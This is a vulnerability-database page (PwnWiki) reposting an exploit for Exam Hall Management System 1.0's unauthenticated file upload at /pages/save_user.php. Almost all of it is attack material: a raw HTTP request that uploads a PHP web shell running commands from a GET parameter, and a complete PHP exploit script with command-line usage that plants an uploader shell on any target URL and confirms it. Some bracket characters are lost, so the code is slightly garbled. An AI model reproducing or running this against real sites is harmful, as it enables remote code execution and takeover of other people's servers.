免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) # Date: 06/07/2021 # Exploit Author: Thamer Almohammadi (@Thamerz88) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html # Version: 1.0 # Tested on: Kali Linux # Proof of Concept : 1- Send Request to /pages/save_user.php. 2- Find your shell.php file path and try any command. ################################## REQUEST ############################### POST /pages/save_user.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877 Content-Length: 369 -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/x-php <?php system($_GET'cmd'); ?> -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="btn_save" -----------------------------3767690350396265302394702877-- ################################## RESPONSE ############################# HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 02:16:18 GMT Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.3.28 Content-Length: 1529 Connection: close Content-Type: text/html; charset=UTF-8 ################################## Exploit ############################# <?php // Coder By Thamer Almohammadi(@Thamerz88); function exploit($scheme,$host,$path,$shell){ $url=$scheme."://".$host.$path; $content='<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES\'userfile\'\'name\');if (move_uploaded_file ($_FILES\'userfile\'\'tmp_name\', $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>'; $data = "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n"; $data .= "Content-Type: image/gif\r\n\r\n"; $data .= "$content\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n"; $data .= "\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n"; $packet .= "Host: $host\r\n"; $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n"; $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n"; $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n"; $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n"; $packet .= $data; $packet .= "\r\n"; send($host, $packet); sleep(2); check($url,$shell); } function send($host, $packet) { if ($connect = @fsockopen ($host, 80, $x, $y, 3)) { @fputs ($connect, $packet); @fclose ($connect); } } function check($url,$shell){ $check=file_get_contents($url."/uploadImage/Profile/".$shell); $preg=preg_match('/(File To Upload)/', $check, $output); if($output0 == "File To Upload"){ echo "+ Upload shell successfully.. :D\n"; echo "+ Link ". $url."/uploadImage/Profile/".$shell."\n"; } else{ //Exploit Failed echo "- Exploit Failed..\n"; } } $options=getopt("u:s:"); if(!isset($options'u', $options's')) die("\n + Simple Exploiter Exam Hall Management System by T3ster \n + Usage : php exploit.php -u http://target.com -s shell.php\n -u http://target.com = Target URL .. -s shell.php = Shell Name ..\n\n"); $url=$options"u"; $shell=$options"s"; $parse=parse_url($url); $host=$parse'host'; $path=$parse'path'; $scheme=$parse'scheme'; exploit($scheme,$host,$path,$shell); ?>
PWNWIK.COM==免费、自由、人人可编辑的漏洞库